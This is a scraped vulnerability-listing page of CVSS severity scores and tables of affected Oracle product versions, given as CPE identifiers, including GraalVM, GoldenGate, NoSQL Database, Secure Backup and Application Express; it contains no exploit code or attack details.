cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
26 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_veridata
oracle
|
cpe:2.3:a:oracle:goldengate_veridata:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:*:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:*:*:*:*:*:*:*:*
|
— | |
|
sqlcl
oracle
|
cpe:2.3:a:oracle:sqlcl:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.2:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.10:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph_mapviewer
oracle
|
cpe:2.3:a:oracle:spatial_and_graph_mapviewer:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.4.0.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.13:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.9:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— |
5.9 (Medium)
Affected products
Known affected
28 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:19.1.0.0.0-19.1.0.0.9:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:23.1.0:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:*:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_veridata
oracle
|
cpe:2.3:a:oracle:goldengate_veridata:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:*:*:*:*:*:*:*:*
|
— | |
|
sqlcl
oracle
|
cpe:2.3:a:oracle:sqlcl:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.2:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.10:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph_mapviewer
oracle
|
cpe:2.3:a:oracle:spatial_and_graph_mapviewer:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.4.0.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.13:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.9:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— |
8.2 (High)
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
15 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
database_-_core
oracle
|
cpe:2.3:a:oracle:database_-_core:23.4-23.5:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— |
6.5 (Medium)
Affected products
Known affected
15 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— |
7.8 (High)
Affected products
Known affected
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
database_-_core
oracle
|
cpe:2.3:a:oracle:database_-_core:21.3-21.15:*:*:*:*:*:*:*
|
— | |
|
database_-_core
oracle
|
cpe:2.3:a:oracle:database_-_core:23.4-23.5:*:*:*:*:*:*:*
|
— | |
|
database_-_core
oracle
|
cpe:2.3:a:oracle:database_-_core:19.3-19.24:*:*:*:*:*:*:*
|
— |
7.3 (High)
Affected products
Known affected
20 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:24.1.17:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:23.3.33:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:20.3.40:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning_-_micronaut
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning_-_micronaut:23.4-23.5:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:22.3.45:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:21.2.71:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— |
7.3 (High)
Affected products
Known affected
17 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5.0:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:24.3.0:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:19.1.0.0.0-19.1.0.0.9:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— |
7.3 (High)
Affected products
Known affected
17 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5.0:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:24.3.0:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:19.1.0.0.0-19.1.0.0.9:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— |
6.5 (Medium)
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— |
6.5 (Medium)
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
database_-_grid
oracle
|
cpe:2.3:a:oracle:database_-_grid:19.3-19.24:*:*:*:*:*:*:*
|
— | |
|
database_-_grid
oracle
|
cpe:2.3:a:oracle:database_-_grid:21.3-21.15:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— |
7.1 (High)
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— |
CWE-77
- Improper Neutralization of Special Elements used in a Command ('Command Injection')
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*
|
— |
9.1 (Critical)
Affected products
Known affected
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
database_-_security
oracle
|
cpe:2.3:a:oracle:database_-_security:19.3-19.24:*:*:*:*:*:*:*
|
— | |
|
database_-_security
oracle
|
cpe:2.3:a:oracle:database_-_security:23.4-23.5:*:*:*:*:*:*:*
|
— | |
|
database_-_security
oracle
|
cpe:2.3:a:oracle:database_-_security:21.3-21.15:*:*:*:*:*:*:*
|
— |
9.1 (Critical)
Affected products
Known affected
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
database_-_security
oracle
|
cpe:2.3:a:oracle:database_-_security:19.3-19.24:*:*:*:*:*:*:*
|
— | |
|
database_-_security
oracle
|
cpe:2.3:a:oracle:database_-_security:23.4-23.5:*:*:*:*:*:*:*
|
— | |
|
database_-_security
oracle
|
cpe:2.3:a:oracle:database_-_security:21.3-21.15:*:*:*:*:*:*:*
|
— |
7.1 (High)
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— |
6.1 (Medium)
Affected products
Known affected
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.1:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:24.1:*:*:*:*:*:*:*
|
— |
6.1 (Medium)
Affected products
Known affected
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.1:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:24.1:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*
|
— |
8.1 (High)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*
|
— |
9.8 (Critical)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*
|
— |
9.1 (Critical)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*
|
— |
9.8 (Critical)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*
|
— |
9.8 (Critical)
Affected products
Known affected
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:19.3-19.24:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:21.3-21.15:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:24.1:*:*:*:*:*:*:*
|
— |
10.0 (Critical)
Affected products
Known affected
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:19.3-19.24:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:21.3-21.15:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:24.1:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
